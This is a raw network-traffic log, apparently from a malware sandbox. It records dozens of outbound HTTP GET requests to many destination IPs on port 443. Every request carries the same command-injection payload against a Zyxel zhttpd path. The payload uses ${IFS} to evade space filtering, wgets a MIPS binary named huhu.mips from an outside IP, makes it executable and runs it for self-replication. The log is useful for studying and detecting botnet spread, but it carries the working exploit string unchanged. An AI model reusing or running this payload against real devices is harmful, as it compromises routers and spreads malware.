                                                      Feb 2, 2024 06:35:59.772798061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6034192.168.2.145668249.197.224.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772831917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6035192.168.2.144175852.246.43.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772857904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6036192.168.2.144508681.154.140.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772903919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6037192.168.2.143640445.199.208.167443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772959948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6038192.168.2.1453318109.109.78.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.772974968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6039192.168.2.1453066191.227.0.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773011923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6040192.168.2.1436206121.58.210.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773057938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6041192.168.2.1443346209.154.135.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773092985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6042192.168.2.145519248.48.83.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773130894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6043192.168.2.1448284169.213.215.160443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773173094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6044192.168.2.1440256205.128.249.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773221016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6045192.168.2.143959283.145.90.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773242950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6046192.168.2.145169862.86.191.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773272038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6047192.168.2.144444213.239.94.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773308039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6048192.168.2.1455688217.170.220.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773339033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6049192.168.2.1458520100.252.243.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773406029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6050192.168.2.14523764.166.78.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773446083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6051192.168.2.1448238137.234.240.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773482084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6052192.168.2.1456908131.151.246.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773514986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6053192.168.2.1437386211.61.160.172443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773566008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6054192.168.2.1450680147.206.33.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773597002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6055192.168.2.1452994105.117.131.156443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773644924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6056192.168.2.145850074.46.208.218443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773682117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6057192.168.2.145769272.252.234.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773731947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6058192.168.2.144491894.179.79.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773771048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6059192.168.2.144837240.212.38.39443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773798943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6060192.168.2.1437980190.178.47.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773843050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6061192.168.2.143790847.27.183.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773871899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6062192.168.2.144584072.155.227.53443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773916006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6063192.168.2.143891085.161.17.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773967028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6064192.168.2.1459240111.255.19.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.773998022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6065192.168.2.145385264.226.128.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774025917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6066192.168.2.1445570108.154.24.43443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774065018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6067192.168.2.1435180155.79.226.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774108887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6068192.168.2.1437110132.208.63.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774151087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6069192.168.2.144240447.130.54.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774169922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6070192.168.2.144695437.55.209.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774211884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6071192.168.2.145430073.22.97.41443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774244070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6072192.168.2.1435058114.143.11.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774283886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6073192.168.2.1440752159.188.80.223443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774321079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6074192.168.2.144798050.169.137.195443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774348974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6075192.168.2.1448016221.91.83.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774393082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6076192.168.2.144500054.129.219.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774435043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6077192.168.2.144189242.230.172.88443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774472952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6078192.168.2.145548893.80.167.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774518013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6079192.168.2.1456682109.255.92.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774566889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6080192.168.2.1451252182.175.100.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774605989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6081192.168.2.144338254.181.169.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774650097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6082192.168.2.1455486121.17.137.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774686098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6083192.168.2.1453224100.19.57.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774730921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6084192.168.2.1445048121.87.80.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774764061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6085192.168.2.144048859.50.97.98443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774794102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6086192.168.2.14349904.9.3.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774837017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6087192.168.2.1439480118.93.165.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774873972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6088192.168.2.1436352223.158.52.101443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774912119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6089192.168.2.1448900123.253.103.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774955988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6090192.168.2.1460044104.171.12.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.774988890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6091192.168.2.143597680.94.125.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775043011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6092192.168.2.144365427.133.199.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775091887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6093192.168.2.14354785.2.119.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775101900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6094192.168.2.145163251.187.213.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775167942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6095192.168.2.1442196200.156.255.130443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:59.775222063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6096192.168.2.1434320223.116.96.102443
                                                      TimestampBytes transferredDirectionData
